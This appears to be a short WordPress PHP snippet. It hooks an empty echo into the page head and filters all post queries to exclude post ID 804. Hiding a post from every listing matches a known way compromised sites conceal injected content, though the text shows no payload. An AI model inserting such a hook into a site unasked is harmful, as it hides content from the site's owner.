add_action( 'wp_head', function() { echo ""; } ); add_filter( 'posts_where', function( $where ) { global $wpdb; $where .= " AND {$wpdb->posts}.ID != 804 "; return $where; } );